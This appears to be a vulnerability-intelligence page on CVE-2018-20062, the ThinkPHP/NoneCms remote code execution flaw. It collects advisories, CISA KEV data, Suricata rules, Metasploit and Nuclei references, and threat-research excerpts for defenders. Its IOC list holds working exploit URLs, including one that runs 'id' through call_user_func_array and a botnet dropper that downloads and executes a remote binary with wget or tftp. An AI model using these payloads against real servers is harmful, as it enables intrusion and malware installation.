CVE-2018-20062
published 2018-12-11CVE-2018-20062: An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter…
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.53%
99.9th percentile
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 5none | nonecms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id↗
url/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J↗
bytes↗
XOR key 0x87, cumulative byte-wise XOR string encryption
- →Detect exploit attempts by looking for HTTP requests to /index.php containing the 's' parameter with '\think\app/invokefunction' or '\think\Request/input' combined with 'filter' and 'call_user_func_array' in the query string. ↗
- →Alert on HTTP responses from ThinkPHP servers that include a 404 status code with a body matching 'copyright.*ThinkPHP', which indicates a vulnerable unpatched instance fingerprinted by attackers. ↗
- →Monitor web server directories for creation of files named 'roeter.php' or downloads of 'public.txt', which are indicators of Dama web shell deployment following exploitation. ↗
- →The Dama web shell uses the password 'admin' for authentication; monitor for POST requests to 'roeter.php' with this credential as a detection signal. ↗
- →Track the AutoFocus tag 'HideNSeek' to identify related malware samples leveraging this ThinkPHP exploit. ↗
- ·The Metasploit module defaults to port 8080 for ThinkPHP targets, but real-world deployments may run on port 80 or 443; adjust RPORT accordingly. ↗
- ·The module automatically attempts to detect the ThinkPHP version and selects between two distinct exploit paths (invokefunction GET for <=5.0.22, captcha POST for 5.0.23); both paths must be covered in detection rules. ↗
- ·Payload delivery servers in the Dama web shell campaign are themselves compromised ThinkPHP hosts (located in Hong Kong), so blocking those IPs may be insufficient as infrastructure rotates through victim nodes. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gf7c-4w4p-7cm5: An issue was discovered in NoneCms V1
ghsa_unreviewed·2022-05-13
CVE-2018-20062 [CRITICAL] CWE-20 GHSA-gf7c-4w4p-7cm5: An issue was discovered in NoneCms V1
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
VulnCheck
ThinkPHP "noneCms" Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Affected: ThinkPHP noneCms
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/; https://securityintelligence.com/posts/top-10-cybersecurity-vulnerabilities-2020/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/defaul
CISA
ThinkPHP "noneCms" Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
Vulnerability: ThinkPHP "noneCms" Remote Code Execution Vulnerability
Affected: ThinkPHP noneCms
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-20062
Remediation Due Date: 2022-05-03
Suricata
ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)
suricata·2022-05-17·CVSS 9.8
CVE-2018-20062 [CRITICAL] ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)
ET EXPLOIT Attempted ThinkPHP any any (msg:"ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; http.request_body; content:"_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]"; fast_pattern; nocase; reference:url,www.exploit-db.com/exploits/46150; reference:cve,2018-20062; reference:cve,2019-9082; classtype:web-application-attack; sid:2036599; rev:1; metadata:attack_target Web_Server, created_at 2022_05_17, cve CVE_2018_20062, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_17;)
Suricata
ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)
suricata·2022-05-17·CVSS 9.8
CVE-2018-20062 [CRITICAL] ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)
ET EXPLOIT Attempted ThinkPHP $HOME_NET any (msg:"ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; http.request_body; content:"_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]"; fast_pattern; nocase; reference:url,www.exploit-db.com/exploits/46150; reference:cve,2018-20062; reference:cve,2019-9082; classtype:web-application-attack; sid:2036598; rev:1; metadata:attack_target Web_Server, created_at 2022_05_17, cve CVE_2018_20062, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_17;)
Exploit-DB
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
exploitdb·2020-04-16
CVE-2019-9082 ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'ThinkPHP Multiple PHP Injection RCEs',
'Description' => %q{
This module exploits one of two PHP injection vulnerabilities in the
ThinkPHP web framework to execute code as the web user.
Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
vulnerable to a separate vulnerability. The module will automatically
attempt to detect the version of the software.
Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
},
'Author' => [
# Discovery by unknown threaty threat actors
'wvu' # Module
],
'References' => [
# https://www.google.com/search?q=thin
Metasploit
ThinkPHP Multiple PHP Injection RCEs
metasploit
ThinkPHP Multiple PHP Injection RCEs
ThinkPHP Multiple PHP Injection RCEs
This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
Nuclei
ThinkPHP 5.0.23 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-20062 [CRITICAL] ThinkPHP 5.0.23 - Remote Code Execution
ThinkPHP 5.0.23 - Remote Code Execution
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
Template:
id: CVE-2018-20062
info:
name: ThinkPHP 5.0.23 - Remote Code Execution
author: dr_set
severity: critical
description: |
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
impact: |
Unauthenticated attackers can execute arbitrary PHP code on the server, leading to complete system comprom
Bleepingcomputer
Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
blogs_bleepingcomputer·2024-06-06·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
## Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
## Bill Toulas
Chinese threat actors are targeting ThinkPHP applications vulnerable to CVE-2018-20062 and CVE-2019-9082 to install a persistent web shell named Dama.
The web shell enables further exploitation of the breached endpoints, such as enlisting them as part of the attackers' infrastructure to evade detection in subsequent operations.
The first signs of this activity date back to October 2023, but according to Akamai analysts monitoring it, the malicious activity has recently expanded and intensified.
## Targeting old vulnerabilities
ThinkPHP is an open-source web application development framework that is particularly popular in China.
CVE-2018-20062 , fixed in December 2018, is an issue discovered in NoneCM
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
[CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Threat Research Center
Threat Research
Vulnerabilities
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
DDoS
Lucifer
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker th
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
CVE-2019-9081 [CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc. The sample was compiled on Thursday, June 11, 2020 10:39:47 PM UTC and caught by Palo Alto Networks Next-Generation Firewall. At the time of writing, the campaign’s still ongoing.
Lucifer is quite powerful in its capabilities. Not only is it capable
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Threat Research Center
Threat Research
Vulnerabilities
## Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Ruchna Nigam
Published: June 12, 2019
Threat Research
Vulnerabilities
CVE-2018-20062
CVE-2019-7238
Exploits
HideNSeek
IoT
Linux
ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets Thin
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE) vulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.
While the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of the CVE-2019-7238 vulnerability being ex
Tenable
Are Your Web Apps Protected Against Component Vulnerabilities?
blogs_tenable·2019-03-21
Are Your Web Apps Protected Against Component Vulnerabilities?
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
blogs_tenable·2019-02-07·CVSS 9.8
[CRITICAL] ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
blogs_tenable·2019-02-07·CVSS 9.8
CVE-2018-20062 [CRITICAL] ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
Blog / Cyber Exposure Alerts
Subscribe
# ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
Satnam Narang
February 7, 2019
2 Min Read
A remote code execution bug in the Chinese open source framework ThinkPHP is being actively used by threat actors to implant a variety of malware, primarily targeting Internet of Things (IoT) devices.
### Background
Over the last few months, attackers have been leveraging CVE-2018-20062, a remote code execution (RCE) vulnerability in Chinese open source PHP framework ThinkPHP, to implant a variety of malware. While the vulnerability was patched on December 9, 2018, a proof of concept (PoC) was published to ExploitDB on December 11.
### Analysis
Shortly after the publication of the PoC, researchers observe
Checkpoint
SpeakUp: A New Undetected Backdoor Linux Trojan
blogs_checkpoint·2019-02-04
CVE-2018-20062 SpeakUp: A New Undetected Backdoor Linux Trojan
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## SpeakUp: A New Undetected Backdoor Linux Trojan
Check Point Research has discovered a new campaign exploiting Linux servers to implant a new Backdoor Trojan.
Dubbed ‘SpeakUp’, the new Tro
http://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.htmlhttps://github.com/nangge/noneCms/issues/21http://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.htmlhttps://github.com/nangge/noneCms/issues/21https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-20062
2018-12-11
Published
2021-11-03
Added to CISA KEV
Exploited in the wild